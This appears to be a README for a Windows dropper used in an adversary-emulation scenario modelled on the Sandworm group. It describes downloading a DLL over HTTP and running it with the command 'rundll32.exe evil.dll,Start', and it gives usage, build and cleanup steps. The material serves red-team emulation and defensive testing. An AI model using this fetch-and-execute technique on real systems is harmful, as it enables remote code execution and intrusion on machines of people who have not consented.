# Exaramel Windows Dropper

This program is used in step5 of the sandworm scenario to download and execute Exaramel-Windows.dll.

This program is executed on target via PsExec.py.

This program then downloads the DLL via HTTP and URLDownloadToFile.

The downloaded DLL is then executed via the C standard library:

system("rundll32.exe evil.dll,Start")

# Quick Start

Execute this program on Windows:

Usage:
    .\Exaramel-Windows-Dropper.exe <url> <file_path>

Example:
    .\Exaramel-windows-Dropper.exe http://192.168.0.4/getFile/Exaramel-Windows.dll .\Exaramel-Windows.dll

Note: This program does not work with self-signed certificates unless you import the certificate on the target system first.

# Build Instructions

Download and install a C++ compiler: https://jmeubank.github.io/tdm-gcc/download/

Run the make.bat script from a terminal (cmd.exe):

make.bat

You should have 'Exaramel-Windows-Dropper.exe' in the current working directory.

# Cleanup Instructions

Delete Exaramel-Windows-Dropper.exe and any downloaded files.

Reboot the system to flush any DLL's from process memory.

# CTI Evidence

Sandworm Team used a backdoor which could execute a supplied DLL using rundll32.exe.

https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/